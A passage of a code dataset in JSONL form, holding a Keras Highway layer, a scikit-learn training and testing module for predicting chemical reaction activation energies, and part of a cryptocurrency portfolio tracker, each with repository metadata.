resolve(\"/api/camera_tasks\").view_name == \"api:cameratask-list\"\n","repo_name":"Azure-Samples/azure-intelligent-edge-patterns","sub_path":"factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/camera_tasks/tests/test_drf_urls.py","file_name":"test_drf_urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"31"} +{"seq_id":"26615818312","text":"from keras.engine import Layer, InputSpec\nfrom keras import regularizers\nfrom keras import constraints\nfrom keras import activations\nfrom keras import initializers\n\n\nclass Highway(Layer):\n \"\"\"Densely connected highway network.\n Highway layers are a natural extension of LSTMs to feedforward networks.\n # Arguments\n init: name of initialization function for the weights of the layer\n (see [initializations](../initializations.md)),\n or alternatively, Theano function to use for weights\n initialization. This parameter is only relevant\n if you don't pass a `weights` argument.\n activation: name of activation function to use\n (see [activations](../activations.md)),\n or alternatively, elementwise Theano function.\n If you don't specify anything, no activation is applied\n (ie. \"linear\" activation: a(x) = x).\n weights: list of Numpy arrays to set as initial weights.\n The list should have 2 elements, of shape `(input_dim, output_dim)`\n and (output_dim,) for weights and biases respectively.\n W_regularizer: instance of [WeightRegularizer](../regularizers.md)\n (eg. L1 or L2 regularization), applied to the main weights matrix.\n b_regularizer: instance of [WeightRegularizer](../regularizers.md),\n applied to the bias.\n activity_regularizer: instance of [ActivityRegularizer](../regularizers.md),\n applied to the network output.\n W_constraint: instance of the [constraints](../constraints.md) module\n (eg. maxnorm, nonneg), applied to the main weights matrix.\n b_constraint: instance of the [constraints](../constraints.md) module,\n applied to the bias.\n bias: whether to include a bias\n (i.e. make the layer affine rather than linear).\n input_dim: dimensionality of the input (integer). This argument\n (or alternatively, the keyword argument `input_shape`)\n is required when using this layer as the first layer in a model.\n # Input shape\n 2D tensor with shape: `(nb_samples, input_dim)`.\n # Output shape\n 2D tensor with shape: `(nb_samples, input_dim)`.\n # References\n - [Highway Networks](http://arxiv.org/abs/1505.00387v2)\n \"\"\"\n\n def __init__(self,\n init='glorot_uniform',\n activation=None,\n weights=None,\n W_regularizer=None,\n b_regularizer=None,\n activity_regularizer=None,\n W_constraint=None,\n b_constraint=None,\n bias=True,\n input_dim=None,\n **kwargs):\n if 'transform_bias' in kwargs:\n kwargs.pop('transform_bias')\n self.init = initializers.get(init)\n self.activation = activations.get(activation)\n\n self.W_regularizer = regularizers.get(W_regularizer)\n self.b_regularizer = regularizers.get(b_regularizer)\n self.activity_regularizer = regularizers.get(activity_regularizer)\n\n self.W_constraint = constraints.get(W_constraint)\n self.b_constraint = constraints.get(b_constraint)\n\n self.bias = bias\n self.initial_weights = weights\n self.input_spec = InputSpec(ndim=2)\n\n self.input_dim = input_dim\n if self.input_dim:\n kwargs['input_shape'] = (self.input_dim,)\n super(Highway, self).__init__(**kwargs)\n\n def build(self, input_shape):\n input_dim = input_shape[1]\n self.input_spec = InputSpec(dtype=K.floatx(),\n shape=(None, input_dim))\n\n self.W = self.add_weight((input_dim, input_dim),\n initializer=self.init,\n name='W',\n regularizer=self.W_regularizer,\n constraint=self.W_constraint)\n self.W_carry = self.add_weight((input_dim, input_dim),\n initializer=self.init,\n name='W_carry')\n if self.bias:\n self.b = self.add_weight((input_dim,),\n initializer='zero',\n name='b',\n regularizer=self.b_regularizer,\n constraint=self.b_constraint)\n self.b_carry = self.add_weight((input_dim,),\n initializer='one',\n name='b_carry')\n else:\n self.b_carry = None\n\n if self.initial_weights is not None:\n self.set_weights(self.initial_weights)\n del self.initial_weights\n self.built = True\n\n def call(self, x):\n y = K.dot(x, self.W_carry)\n if self.bias:\n y += self.b_carry\n transform_weight = activations.sigmoid(y)\n y = K.dot(x, self.W)\n if self.bias:\n y += self.b\n act = self.activation(y)\n act *= transform_weight\n output = act + (1 - transform_weight) * x\n return output\n\n def get_config(self):\n config = {'init': initializers.serialize(self.init),\n 'activation': activations.serialize(self.activation),\n 'W_regularizer': regularizers.serialize(self.W_regularizer),\n 'b_regularizer': regularizers.serialize(self.b_regularizer),\n 'activity_regularizer':\n regularizers.serialize(self.activity_regularizer),\n 'W_constraint': constraints.serialize(self.W_constraint),\n 'b_constraint': constraints.serialize(self.b_constraint),\n 'bias': self.bias,\n 'input_dim': self.input_dim}\n base_config = super(Highway, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))","repo_name":"BigDaMa/ExampleDrivenErrorDetection","sub_path":"model/ml/active_learning/classifier_one/HighWay.py","file_name":"HighWay.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"36432795862","text":"'''KPM Neural Network Training Module\n\nUsed to create new KPM models and test their accuracy on\ngiven molecular datasets.\n'''\n\nfrom KPM.utils.data_funcs import load_dataset, extract_data, split_data\nfrom KPM.utils.data_funcs import normalise, un_normalise\nfrom KPM.utils.descriptors import calc_diffs\n\nfrom sklearn import preprocessing\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.model_selection import GridSearchCV, KFold\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom sklearn.utils import shuffle\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport json\n\nfrom numpy.typing import ArrayLike\n\nclass ModelTrainer:\n '''Trains a neural network on a dataset of reactions.\n \n Takes in all required arguments through train_args.\n Datasets should be provided as csv files in the same\n format as the supplied b97d3 dataset.\n\n Arguments:\n args: argparse Namespace from CLI.\n '''\n def __init__(self, args):\n '''Initialise class from supplied CLI arguments.'''\n\n print('--------------------------------------------')\n print('KPM Model Training')\n print('--------------------------------------------\\n')\n\n self.argparse_args = args\n\n self.dataset = args.dataset\n self.num_reacs = args.num_reacs\n\n self.model_out = args.model_out\n self.train_direction = args.train_direction\n self.separate_test_dataset = args.separate_test_dataset\n self.separate_train_dataset = args.separate_train_dataset\n self.norm_type = args.norm_type\n self.norm_eacts = True if args.norm_eacts == 'True' else False\n self.split_method = args.split_method\n self.split_ratio = args.split_ratio\n self.split_num = args.split_num\n self.split_index_path = args.split_index_path\n self.random_seed = args.random_seed\n self.training_prediction_dir = args.training_prediction_dir\n self.save_test_train_path = args.save_test_train_path\n self.plot_dir = args.plot_dir\n self.do_hyperparams = True if args.opt_hyperparams == 'True' else False\n self.hyperparam_jobs = args.opt_hyperparams_jobs\n self.hyperparam_file = args.opt_hyperparams_file\n self.nn_activation_function = args.nn_activation_function\n self.nn_ensemble_size = args.nn_ensemble_size\n self.nn_solver = args.nn_solver\n self.nn_layers = [args.nn_layers] if type(args.nn_layers) == int else args.nn_layers\n self.nn_alpha = args.nn_alpha\n self.nn_max_iters = args.nn_max_iters\n self.nn_learning_rate = args.nn_learning_rate\n self.nn_learning_rate_init = args.nn_learning_rate_init\n self.nn_out_activation = args.nn_out_activation\n self.nn_learning_rate_max = args.nn_learning_rate_max # Not used yet, doesn't look like this is an option.\n self.descriptor_type = args.descriptor_type # Only MorganF currently implemented.\n self.similarity_type = args.similarity_type # Not used yet.\n self.smiles_type = args.smiles_type # Not used yet.\n self.morgan_num_bits = args.morgan_num_bits\n self.morgan_radius = args.morgan_radius\n self.verbose = True if args.verbose == 'True' else False\n\n # Sanitise input for separate test/train datasets.\n if self.separate_train_dataset is not None:\n if self.separate_test_dataset is None:\n raise ValueError('If separate_train_dataset is specified, separate_test_dataset must also be specified.')\n elif self.separate_test_dataset is not None:\n if self.separate_train_dataset is None:\n raise ValueError('If separate_test_dataset is specified, separate_train_dataset must also be specified.')\n\n # Modify number of reactions based on train_direction.\n if self.train_direction == 'both':\n self.num_reacs = 2*self.num_reacs\n\n # Set up the neural network hyperparameter dictionary.\n self.nn_params = {\n 'hidden_layer_sizes': self.nn_layers,\n 'activation': self.nn_activation_function,\n 'solver': self.nn_solver,\n 'alpha': self.nn_alpha,\n 'learning_rate': self.nn_learning_rate,\n 'learning_rate_init': self.nn_learning_rate_init,\n 'max_iter': self.nn_max_iters,\n 'random_state': self.random_seed\n }\n\n\n def process(self):\n '''Process the data into training and test datasets.'''\n # If loading a single combined dataset that needs to be split...\n if self.separate_test_dataset is None:\n print('Taking train/test data from a single dataset.')\n ea, dh, rs, ps = load_dataset(self.dataset)\n\n # Extract and transform data dependent on train_direction.\n Eact, dH, rmol, pmol = extract_data(ea, dh, rs, ps, self.num_reacs, self.train_direction)\n\n avg_Eact = np.mean(Eact)\n avg_dH = np.mean(dH)\n if self.verbose:\n print(f'\\nLength of Eact = {len(Eact)}, Mean Eact = {avg_Eact} kcal/mol')\n print(f'Length of dH = {len(dH)}, Mean dH = {avg_dH} kcal/mol')\n print(f'Total number of MOL objects = {len(rmol)}\\n')\n\n # Normalise Eact.\n std_Eact = np.std(Eact)\n if self.norm_eacts:\n Eact = normalise(Eact, avg_Eact, std_Eact, self.norm_type)\n\n if self.verbose: print('Data sorted. Calculating reaction difference fingerprints.')\n\n # Calculate reaction difference fingerprints.\n diffs = calc_diffs(self.num_reacs, self.descriptor_type, rmol, pmol, dH, \n self.morgan_radius, self.morgan_num_bits)\n\n print('Fingerprint calculation complete.')\n if self.verbose: print(f'\\nSplitting train/test data.')\n\n # Split data into train/test sets.\n X_train, X_test, y_train, y_test = split_data('train_test_split', diffs, Eact, self.split_ratio,\n self.random_seed, index_path=self.split_index_path,\n verbose=self.verbose)\n # Else if loading separate train/test datasets...\n else:\n print('Taking train/test data from separate datasets.')\n ea_train, dh_train, rs_train, ps_train = load_dataset(self.separate_train_dataset)\n ea_test, dh_test, rs_test, ps_test = load_dataset(self.separate_test_dataset)\n\n # Extract and transform data dependent on train_direction.\n num_train_reacs = len(ea_train)\n num_test_reacs = len(ea_test)\n Eact_train, dH_train, rmol_train, pmol_train = extract_data(ea_train, dh_train, rs_train, ps_train, \n num_train_reacs, self.train_direction)\n Eact_test, dH_test, rmol_test, pmol_test = extract_data(ea_test, dh_test, rs_test, ps_test, \n num_test_reacs, self.train_direction)\n\n avg_Eact = np.mean(Eact_train)\n avg_dH_train = np.mean(dH_train)\n avg_Eact_test = np.mean(Eact_test)\n avg_dH_test = np.mean(dH_test)\n if self.verbose:\n print(f'Length of Eact (train) = {len(Eact_train)}, Mean Eact (train) = {avg_Eact} kcal/mol')\n print(f'Length of dH (train) = {len(dH_train)}, Mean dH (train) = {avg_dH_train} kcal/mol')\n print(f'Total number of training MOL objects = {len(rmol_train)}')\n print(f'Length of Eact (test) = {len(Eact_test)}, Mean Eact (test) = {avg_Eact_test} kcal/mol')\n print(f'Length of dH (test) = {len(dH_test)}, Mean dH (test) = {avg_dH_test} kcal/mol')\n print(f'Total number of testing MOL objects = {len(rmol_test)}')\n\n # Normalise Eact from training data.\n std_Eact = np.std(Eact_train)\n if self.norm_eacts:\n Eact_train = normalise(Eact_train, avg_Eact, std_Eact, self.norm_type)\n Eact_test = normalise(Eact_test, avg_Eact, std_Eact, self.norm_type)\n\n if self.verbose: print('Data sorted. Calculating reaction difference fingerprints.')\n\n # Calculate reaction difference fingerprints.\n diffs_train = calc_diffs(num_train_reacs, self.descriptor_type, rmol_train, pmol_train, dH_train,\n self.morgan_radius, self.morgan_num_bits)\n diffs_test = calc_diffs(num_test_reacs, self.descriptor_type, rmol_test, pmol_test, dH_test,\n self.morgan_radius, self.morgan_num_bits)\n\n print('Fingerprint calculation complete.')\n\n X_train = diffs_train\n X_test = diffs_test\n y_train = Eact_train\n y_test = Eact_test\n\n if self.save_test_train_path is not None:\n np.savez(self.save_test_train_path, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n if self.verbose: print(f'Saved train/test data to {self.save_test_train_path}.\\n')\n\n print('Train/test data ready.')\n\n self.norm_avg_Eact = avg_Eact\n self.norm_std_Eact = std_Eact\n return X_train, X_test, y_train, y_test\n\n\n def opt_hyperparams(self, X_train: ArrayLike, y_train: ArrayLike):\n '''Optimises hyperparameters of an MLPRegressor.\n\n Arguments:\n X_train: Array of reaction difference fingerprints.\n y_train: Array of normalised activation energies.\n '''\n if self.hyperparam_file is None:\n # Search over a default parameter space.\n param_grid = {\n 'hidden_layer_sizes': [(100,), (200,), (300,), (100, 100,), (200, 200,)],\n 'alpha': [1e-5, 1e-4, 1e-3],\n 'learning_rate_init': [1e-4, 1e-3, 1e-2],\n 'max_iter': [200, 500, 1000]\n }\n else:\n with open(self.hyperparam_file, 'r') as f:\n param_grid = json.load(f)\n\n search_keys = param_grid.keys()\n for key in search_keys:\n if key in self.nn_params.keys():\n self.nn_params.pop(key)\n\n est = MLPRegressor(**self.nn_params)\n cv = KFold(4)\n gs = GridSearchCV(est, param_grid, cv=cv, n_jobs=self.hyperparam_jobs, verbose=3)\n gs.fit(X_train, y_train)\n \n return gs.best_params_\n\n\n def run(self, X_train: ArrayLike, y_train: ArrayLike):\n '''Runs the model training procedure.\n \n Arguments:\n X_train: Array of reaction difference fingerprints.\n y_train: Array of normalised activation energies.\n '''\n scaler = preprocessing.StandardScaler().fit(X_train)\n X_train_scaled = scaler.transform(X_train)\n if self.verbose: print('Scaled data.')\n\n if self.do_hyperparams:\n print('Running hyperparameter optimisation.')\n # Note that this removes all keys being optimised from `self.nn_params`\n regr_params = self.opt_hyperparams(X_train_scaled, y_train)\n if self.verbose: \n print('Optimised hyperparameters: ')\n print(regr_params)\n # Re-add the optimised hyperparameters.\n self.nn_params = {**self.nn_params, **regr_params}\n\n print(f'Training {self.nn_ensemble_size} neural networks.')\n regr = []\n for i in range(self.nn_ensemble_size):\n if self.verbose: print(f'Training NN {i+1}...')\n rs = self.random_seed+i if self.random_seed is not None else None\n X, y = shuffle(X_train_scaled, y_train, random_state=rs)\n self.nn_params['random_state'] = rs\n if self.nn_out_activation != 'identity':\n # This trick is required to bypass the initializer, which enforces identity.\n self.nn_params['warm_start'] = True\n nn = MLPRegressor(**self.nn_params)\n nn.partial_fit(X, y)\n nn.out_activation_ = self.nn_out_activation\n regr.append(nn.fit(X, y))\n else:\n nn = MLPRegressor(**self.nn_params)\n regr.append(nn.fit(X, y))\n\n if self.verbose: print(f'Saving models to {self.model_out}')\n print('Training complete!\\n')\n \n norm_vars = [self.norm_avg_Eact, self.norm_std_Eact]\n np.savez(self.model_out, models=regr, scaler=scaler, norm_vars=norm_vars, args=self.argparse_args)\n\n\nclass ModelTester:\n '''Tests prediction accuracy of a KPM model.\n \n Loads in a previously trained model, extracting arguments\n directly from it. Uses a secondary dataset as test data,\n and predicts Eact values for this dataset, producing a\n correlation plot for these predictions.\n\n Arguments:\n model_path: Path to pickle file containing KPM model(s).\n test_args: argparse Namespace from running KPM in 'test' mode.\n '''\n def __init__(self, model_path: str, test_dataset: str = None, test_num_reacs: int = None,\n plot_dir: str = './', verbose: str = 'False'):\n '''Initialise KPM model tester.'''\n\n print('--------------------------------------------')\n print('KPM Model Testing')\n self.verbose = True if verbose == 'True' else False\n\n model = np.load(model_path, allow_pickle=True)\n self.regr = model['models']\n self.scaler = model['scaler'][()] # scaler gets saved as a 0D array.\n norm_vars = model['norm_vars']\n self.norm_avg_Eact = norm_vars[0]\n self.norm_std_Eact = norm_vars[1]\n self.training_args = model['args'][()] # args gets saved as a 0D array.\n args = self.training_args\n\n self.orig_dataset = args.dataset\n self.orig_num_reacs = args.num_reacs\n self.model_out = args.model_out\n self.train_direction = args.train_direction\n self.separate_test_dataset = args.separate_test_dataset\n self.separate_train_dataset = args.separate_train_dataset\n self.norm_type = args.norm_type\n self.norm_eacts = True if args.norm_eacts == 'True' else False\n self.split_method = args.split_method\n self.split_ratio = args.split_ratio\n self.split_num = args.split_num\n self.split_index_path = args.split_index_path\n self.random_seed = args.random_seed\n self.training_prediction_dir = args.training_prediction_dir\n self.save_test_train_path = args.save_test_train_path\n self.plot_dir = args.plot_dir\n self.nn_activation_function = args.nn_activation_function\n self.nn_ensemble_size = args.nn_ensemble_size\n self.nn_solver = args.nn_solver\n self.nn_learning_rate = args.nn_learning_rate\n self.nn_learning_rate_init = args.nn_learning_rate_init\n self.nn_learning_rate_max = args.nn_learning_rate_max # Not used yet, doesn't look like this is an option.\n self.descriptor_type = args.descriptor_type\n self.similarity_type = args.similarity_type # Not used yet.\n self.smiles_type = args.smiles_type # Not used yet.\n self.morgan_num_bits = args.morgan_num_bits\n self.morgan_radius = args.morgan_radius\n\n # \n if test_dataset is not None:\n print(f'Testing with data from {test_dataset}')\n self.dataset = test_dataset\n self.num_reacs = test_num_reacs\n self.plot_dir = plot_dir\n # Modify number of reactions based on train_direction.\n if self.train_direction == 'both':\n self.num_reacs = 2*self.num_reacs\n else:\n print('Testing with data from original test/train split.')\n\n print('--------------------------------------------\\n')\n\n\n def process_test_data(self):\n '''Process a new dataset into X_test and y_test arrays.\n \n When in test-only mode and provided with a new dataset of\n reactions, runs through the process of extracting data\n and creating a test set to run predictions on.\n '''\n if self.dataset is None:\n raise RuntimeError('This function can only be run when new test data is provided!')\n\n print('Loading in new test dataset.\\n')\n # print(self.dataset, type(self.dataset))\n ea, dh, rs, ps = load_dataset(self.dataset)\n\n # Extract and transform data dependent on train_direction.\n Eact, dH, rmol, pmol = extract_data(ea, dh, rs, ps, self.num_reacs, self.train_direction)\n\n avg_Eact = np.mean(Eact)\n avg_dH = np.mean(dH)\n if self.verbose:\n print(f'\\nLength of Eact = {len(Eact)}, Mean Eact = {avg_Eact} kcal/mol')\n print(f'Length of dH = {len(dH)}, Mean dH = {avg_dH} kcal/mol')\n print(f'Total number of MOL objects = {len(rmol)}\\n')\n\n # Normalise Eact\n Eact = normalise(Eact, self.norm_avg_Eact, self.norm_std_Eact, self.norm_type)\n\n if self.verbose: print('Data loaded. Calculating reaction difference fingerprints.')\n\n # Calculate reaction difference fingerprints.\n diffs = calc_diffs(self.num_reacs, self.descriptor_type, rmol, pmol, dH, self.morgan_radius, self.morgan_num_bits)\n print('Fingerprint calculation complete.')\n\n return diffs, Eact\n\n\n def predict(self, X: ArrayLike, y: ArrayLike, data_type):\n '''Use the loaded model to predict Eact for a train/test dataset.\n \n Generic function to predict Eact values for either training or\n test data across an ensemble of neural networks. Uses actual Eact\n values for the given reactions to return R**2 values for each\n model in the ensemble.\n \n Arguments:\n X: Array of reaction difference fingerprints.\n y: Actual Eact values for these reactions.\n data_type: Either 'train' or 'test', determines verbose output.\n '''\n if data_type not in ['train', 'test']:\n raise ValueError('Unknown data_type! Must be either \\'train\\' or \\'test\\'.')\n\n print(f'Predicting Eact values for {data_type}ing data.')\n if self.verbose:\n print(f'Predicting Eact across {self.nn_ensemble_size} NNs.\\n')\n\n n_reacs = len(X)\n X = self.scaler.transform(X)\n\n Eact_pred = np.zeros((n_reacs, self.nn_ensemble_size))\n r2s = np.zeros(self.nn_ensemble_size)\n for i in range(self.nn_ensemble_size):\n pred = self.regr[i].predict(X)\n # Reverse normalisation if Eacts were normalised in training.\n if self.norm_eacts:\n pred = un_normalise(pred, self.norm_avg_Eact, self.norm_std_Eact, self.norm_type)\n Eact_pred[:, i] = pred\n r2 = self.regr[i].score(X, y)\n r2s[i] = r2\n if self.verbose: print(f'NN{i} R2 = {r2}')\n\n Eacts = np.mean(Eact_pred, axis=1)\n uncerts = np.std(Eact_pred, axis=1)\n if self.verbose: print(f'Average R2 = {np.mean(r2s)}')\n\n # Save predictions if requested.\n if self.training_prediction_dir is not None:\n save_path = os.path.join(self.training_prediction_dir, f'Eact_pred_{data_type}.npz')\n np.savez(save_path, Eacts=Eacts, uncerts=uncerts)\n if self.verbose: print(f'Predictions saved to {save_path}\\n')\n\n return Eacts, uncerts\n\n \n def plot_correlation(self, y_true: ArrayLike, y_pred: ArrayLike, y_uncert: ArrayLike, data_type: str):\n '''Use the loaded model to plot correlation between predicted and actual Eact values.\n \n Generic function to plot correlation plots for either training or\n test data. Prints a variety of error metrics for given data.\n\n Arguments:\n y_true: Actual Eact values for reactions in dataset.\n y_pred: Predicted Eact values for reactions in dataset.\n y_uncert: Uncertainties in predicted Eact values.\n data_type: Either 'train' or 'test', determines plot wording and colours.\n '''\n if data_type not in ['train', 'test']:\n raise ValueError('Unknown data_type! Must be either \\'train\\' or \\'test\\'.')\n\n print(f'Analysis on {data_type}ing data prediction:')\n\n # Un-normalise true data if it was normalised in training.\n if self.norm_eacts:\n y_true = un_normalise(y_true, self.norm_avg_Eact, self.norm_std_Eact, self.norm_type)\n \n # Calculate error metrics.\n mse = mean_squared_error(y_true, y_pred)\n rmse = np.sqrt(mse)\n mae = mean_absolute_error(y_true, y_pred)\n\n print(f'Mean Absolute Error (MAE) in {data_type}ing data prediction: {mae} kcal/mol')\n print(f'Mean Squared Error (MSE) in {data_type}ing data prediction: {mse} kcal/mol')\n print(f'Root Mean Squared Error (RMSE) in {data_type}ing data prediction: {rmse} kcal/mol\\n')\n\n # Plot correlation.\n if self.verbose: print('Plotting correlation between true and predicted values.')\n col = 'blue' if data_type == 'train' else 'purple'\n fignum = 1 if data_type == 'train' else 2\n\n fig = plt.figure(fignum, figsize=(8, 6), dpi=100)\n ax = plt.gca()\n plt.plot(y_true, y_true, color='orange', lw=3)\n plt.errorbar(y_true, y_pred, yerr=y_uncert, fmt='o', color=col, mfc='white', markersize=8, mew=2, alpha=0.5)\n plt.text(0.02, 0.98, f'MAE: {mae:.3f} kcal/mol\\nRMSE: {rmse:.3f} kcal/mol',\n horizontalalignment='left', verticalalignment='top', \n fontsize=16, transform=ax.transAxes)\n plt.ylabel(r\"Predicted E$_a$ (kcal/mol)\", fontsize=16)\n plt.xlabel(r\"True E$_a$ (kcal/mol)\", fontsize=16)\n plt.yticks(fontsize=16)\n plt.xticks(fontsize=16)\n fig.tight_layout()\n if self.plot_dir is not None:\n save_path = os.path.join(self.plot_dir, f'corr_{data_type}.png')\n if not os.path.exists(self.plot_dir): os.mkdir(self.plot_dir)\n plt.savefig(save_path, dpi=300)\n if self.verbose: print(f'Saved plot to {save_path}\\n')\n \n plt.pause(0.01)","repo_name":"idilismail/KineticPredictorModel","sub_path":"KPM/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":22239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41488204228","text":"import decimal\nimport csv\nfrom typing import List, Tuple\nimport sys\n\nfrom pycoingecko import CoinGeckoAPI # type: ignore\n\nfrom supported_coins import supported_coins\n\n\ncg = CoinGeckoAPI()\nPORTFOLIO_FILE: str = \"portfolio.csv\"\n\n\ndef valid_args(ticker: str, amount: str) -> bool:\n \"\"\"\n Combines two functions to check if the user's input is correct\n :param ticker: ticker for the coin typed by the user\n :param amount: amount of the coin typed by the users\n :return: True if all arguments are correct of r False if one is wrong\n \"\"\"\n if valid_coin(ticker) and valid_amount(amount):\n return True\n else:\n return False\n\n\ndef valid_coin(ticker: str) -> bool:\n \"\"\"\n Checks if the coin typed by the user is supported by the program.\n\n The list of supported coins was parsed from the CoinGecko API\n and comprises the top 100 coins by market cap in november/2022.\n :param ticker: ticker of the coin typed by the user\n :return: True if the coin is supported. If not the program closes with\n an error message\n \"\"\"\n for coin in supported_coins:\n if coin[\"symbol\"] != ticker:\n continue\n else:\n return True\n sys.exit(\"ERROR: invalid coin\")\n\n\ndef valid_amount(amount: str) -> bool:\n \"\"\"\n Checks if the amount typed by the user is a number (int or float)\n and if it is positive\n :param amount: amount typed by the user\n :return: True if the amount is valid. If not the program closes with\n an error message\n \"\"\"\n try:\n float(amount)\n if float(amount) < 0:\n sys.exit(\"ERROR: amount must be a positive number\")\n else:\n return True\n except ValueError:\n sys.exit(\"ERROR: amount must be a positive number\")\n\n\ndef read_csv(filename: str) -> List[dict]:\n \"\"\"\n Reads the portfolio file to perform operations with them\n :param filename: name of the portfolio file\n :return: a list containing one dict for each coin in the portfolio\n \"\"\"\n with open(filename, newline=\"\") as readfile:\n reader = csv.DictReader(readfile)\n return [row for row in reader]\n\n\ndef write_csv(filename: str, values: List[dict]) -> None:\n \"\"\"\n After any operation is done in with the values this function\n will write the modified data to the portfolio file\n :param filename: name of the portfolio file\n :param values: list of dicts with modifications\n :return: None\n \"\"\"\n fieldnames: list = [\"id\", \"ticker\", \"amount\"]\n with open(filename, \"w\", newline=\"\") as writefile:\n writer = csv.DictWriter(writefile, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(values)\n\n\ndef deposit(ticker: str, amount: str) -> None:\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n if in_portfolio(ticker):\n for coin in portfolio:\n if coin[\"ticker\"] == ticker:\n coin[\"amount\"] = decimal.Decimal(coin[\"amount\"]) + decimal.Decimal(amount)\n else:\n portfolio.append({\"ticker\": ticker, \"amount\": amount, \"id\": get_coin_id(ticker)})\n\n write_csv(PORTFOLIO_FILE, portfolio)\n\n\ndef withdraw(ticker: str, amount: str) -> None:\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n if in_portfolio(ticker):\n for coin in portfolio:\n if coin[\"ticker\"] == ticker:\n coin[\"amount\"] = decimal.Decimal(coin[\"amount\"]) - decimal.Decimal(amount)\n if coin[\"amount\"] < 0:\n sys.exit(\"ERROR: not enough funds to withdraw\")\n\n write_csv(PORTFOLIO_FILE, portfolio)\n\n\ndef update(ticker: str, amount: str) -> None:\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n for coin in portfolio:\n if coin[\"ticker\"] == ticker:\n coin[\"amount\"] = amount\n\n write_csv(PORTFOLIO_FILE, portfolio)\n\n\ndef erase(ticker: str) -> None:\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n for coin in portfolio:\n if coin[\"ticker\"] == ticker:\n portfolio.remove(coin)\n\n if input(f\"ERASE {str(ticker).upper()}? (y/n)\\n\").lower() == \"y\":\n write_csv(PORTFOLIO_FILE, portfolio)\n else:\n sys.exit(\"Operation cancelled\")\n\n\ndef reset() -> None:\n if input(f\"RESET portfolio? (y/n)\\n\").lower() == \"y\":\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n for coin in portfolio:\n portfolio.remove(coin)\n\n write_csv(PORTFOLIO_FILE, portfolio)\n\n else:\n sys.exit(\"Operation cancelled\")\n\n\ndef print_table() -> None:\n portfolio, totals = get_values()\n\n print()\n print(\" CRYPTO TRACKER \".center(83, \"*\"))\n print()\n print(\n \"TICKER\".ljust(10),\n \"AMOUNT\".ljust(13),\n \"PRICE\".rjust(6),\n \"Δ 24H\".rjust(10),\n \"USD\".rjust(10),\n \"BRL\".rjust(14),\n \"%\".rjust(11),\n )\n print(\"-\".center(83, \"-\"))\n\n for coin in sorted(portfolio, key=lambda c: c[\"usd_value\"], reverse=True):\n print(\n f\"{coin['ticker'].upper():<5}\",\n f\"{float(coin['amount']):>11,.3f}\",\n f\"{float(coin['rates']['usd']):>13,.2f}\",\n f\"{coin['delta_24']:>10.3f}\",\n f\"{float(coin['usd_value']):>13,.2f}\",\n f\"{float(coin['brl_value']):>14,.2f}\",\n f\"{coin['%']:>10.2f}%\",\n )\n\n print(\"-\".center(83, \"-\"))\n print()\n print(\"TOTAL:\".rjust(45), f\"{totals[0]:>10,.2f}\", f\"{totals[1]:>14,.2f}\")\n print()\n print(\"*\".center(83, \"*\"))\n print()\n\n\ndef in_portfolio(ticker: str) -> bool:\n \"\"\"\n Checks if a certain coin is already in the portfolio\n :param ticker: str with the ticker of the coin\n :return: True or False\n \"\"\"\n portfolio = read_csv(PORTFOLIO_FILE)\n for row in portfolio:\n if row[\"ticker\"] == ticker:\n return True\n else:\n continue\n return False\n\n\ndef get_coin_id(ticker: str) -> str:\n \"\"\"\n Gets the id used to parse data from the CoinGecko API\n :param ticker: ticker of the coin\n :return: str with the coin's id\n \"\"\"\n for coin in supported_coins:\n if coin[\"symbol\"] == ticker:\n return coin[\"id\"]\n else:\n continue\n\n\ndef get_values() -> Tuple[List[dict], Tuple[float, float]]:\n \"\"\"\n Reads the data in the portfolio and calculate the values of each coin\n in USD and BRL. Adds these values to a dict and returns it\n :return: a list of dicts for each coin and a tuple with the total worth\n of the portfolio in USD and BRL\n \"\"\"\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n rates: List[dict] = get_rates(portfolio)\n deltas: dict = get_delta(portfolio)\n\n for coin in portfolio:\n coin[\"rates\"] = rates[coin[\"id\"]]\n coin[\"usd_value\"] = float(coin[\"amount\"]) * float(coin[\"rates\"][\"usd\"])\n coin[\"brl_value\"] = float(coin[\"amount\"]) * float(coin[\"rates\"][\"brl\"])\n coin[\"delta_24\"] = deltas[coin[\"id\"]]\n\n totals: Tuple[float, float] = get_totals(portfolio)\n\n for coin in portfolio:\n coin[\"%\"] = (float(coin[\"usd_value\"]) / totals[0]) * 100\n\n return portfolio, totals\n\n\ndef get_rates(portfolio: List[dict]) -> List[dict]:\n \"\"\"\n Requests the CoinGecko API for the current rate for each coin\n :param portfolio: list of dicts for each coin in portfolio\n :return: list of dicts with the current price for each coin in portfolio\n \"\"\"\n return cg.get_price(ids=[coin[\"id\"] for coin in portfolio], vs_currencies=[\"usd\", \"brl\"])\n\n\ndef get_delta(portfolio: List[dict]) -> dict:\n \"\"\"\n Requests the CoinGecko API fot the 24 hours variation in price\n for each coin in the portfolio\n :param portfolio: list of dicts for each coin in portfolio\n :return: dictionary with the coin and its 24 hours variation in price\n \"\"\"\n market_data: dict = cg.get_coins_markets(vs_currency=\"usd\", ids=[coin[\"id\"] for coin in portfolio])\n return {coin[\"id\"]: coin[\"price_change_percentage_24h\"] for coin in market_data}\n\n\ndef get_totals(portfolio: List[dict]) -> Tuple[float, float]:\n \"\"\"\n Sum the value for every coin in the portfolio to get the total\n value both in USD and BRL\n :param portfolio: list of dicts for each coin in portfolio\n :return: total value in USD and BRL\n \"\"\"\n total_usd: float = 0.0\n total_brl: float = 0.0\n for coin in portfolio:\n total_usd += float(coin[\"usd_value\"])\n 